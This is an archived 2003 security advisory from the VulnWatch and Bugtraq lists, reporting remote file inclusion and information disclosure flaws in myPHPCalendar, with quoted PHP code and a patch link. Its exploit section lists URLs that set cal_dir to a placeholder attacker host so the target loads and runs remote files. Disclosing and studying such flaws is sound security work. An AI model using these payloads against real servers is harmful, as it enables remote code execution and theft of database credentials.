[VulnWatch] myPHPCalendar : Informations Disclosure, File Include

From: Frog Man (leseulfrog_at_hotmail.com)
Date: 10/12/03

  • Next message: Chris Wysopal: "[VulnWatch] 5 Windows vulnerabilities for October 2003 (4 critical, 1 important)"
    To: vulnwatch@vulnwatch.org, bugtraq@securityfocus.com
    Date: Sun, 12 Oct 2003 13:18:44 +0200
    
    

    Informations :
    같같같같같같
    Language : PHP
    Version : 10192000 Build 1 Beta
    Website : http://myphpcalendar.sourceforge.net/
    Problems :
    - Informations Disclosure
    - File Include

    PHP Code/Location :
    같같같같같같같같같

    admin.php, contacts.php, convert-date.php :

    ------------------------
    include ("globals.inc");
    ------------------------

    globals.inc :

    ------------------------------
    include($cal_dir."vars.inc");
    include($cal_dir."prefs.inc");
    ------------------------------

    index.php :

    ----------------------------------------
    include ($cal_dir."globals.inc");
    [...]
    include($cal_dir."sql.inc");
    ----------------------------------------

    setup.php :

    ----------------------------------------------------------------
    $fp = fopen("setup.inc", "w+");
    fputs($fp, "<?php\n");
    fputs($fp, "\$url = \"".$URL."\";\n");
    fputs($fp, "\$mainscript = \"".$MAINSCRIPT."\";\n");
    fputs($fp, "\$mysql_server = \"".$MYSQL_SERVER."\";\n");
    fputs($fp, "\$mysql_username = \"".$MYSQL_USERNAME."\";\n");
    fputs($fp, "\$mysql_pass = \"".$MYSQL_PASS."\";\n");
    fputs($fp, "\$database_name = \"".$DATABASE_NAME."\";\n");
    fputs($fp, "\$db_type = \"".$DB_TYPE."\";\n");
    fputs($fp, "\$user_text = \"".$USER_TEXT."\";\n");
    fputs($fp, "\$crypt_type = \"".$CRYPT_TYPE."\";\n");
    fputs($fp, "\$display_username = \"".$DISPLAY_USERNAME."\";\n");
    fputs($fp, "\$maxdisplay = \"".$MAXDISPLAY."\";\n");
    fputs($fp, "\$admin_email = \"".$ADMIN_EMAIL."\";\n");
    ----------------------------------------------------------------

    Exploits :
    같같같같

    http://[target]/admin.php?cal_dir=http://[attacker]/
    http://[target]/contacts.php?cal_dir=http://[attacker]/
    http://[target]/convert-date.php?cal_dir=http://[attacker]/

    will include the files :

    http://[attacker]/vars.inc and/or http://[attacker]/prefs.inc

    and http://[target]/index.php?cal_dir=http://[attacker]/ will include the
    files :
    http://[target]/globals.inc http://[target]/sql.inc

    Patch :
    같같같
    A patch and more details can be found on http://www.phpsecure.info.

    frog-m@n

    _________________________________________________________________
    Utilisez votre MSN Messenger via votre GSM !
    http://www.fr.msn.be/gsm/servicesms/messengerparsms


  • Next message: Chris Wysopal: "[VulnWatch] 5 Windows vulnerabilities for October 2003 (4 critical, 1 important)"

    Relevant Pages

    • myPHPCalendar : Informations Disclosure, File Include
      ... Version: 10192000 Build 1 Beta ... Website: http://myphpcalendar.sourceforge.net/ ... Informations Disclosure ... Utilisez votre MSN Messenger via votre GSM! ...
      (Bugtraq)
    • Multiple Web Security Holes
      ... I try so on bugtraq, ... Five products in PHP are vulnerable to various holes. ... Problem: BD informations disclosure ... Website: http://py-scripts.levillage.org/ ...
      (Bugtraq)
    • GTcatalog (PHP)
      ... Website: http://www.geektweaked.com ... Informations Disclosure (Admin Password) ... switch ...
      (Bugtraq)
    • [VulnWatch] GTcatalog (PHP)
      ... Website: http://www.geektweaked.com ... Informations Disclosure (Admin Password) ... switch ...
      (VulnWatch)
    • Achims Guestbook, InertiaNews, Pollen, MyPhpChat, mcPass
      ... Informations Disclosure ... InertiaNews 0.02 beta ... Path Disclosure ... Distortion of the security against the multiple votes ...
      (Vuln-Dev)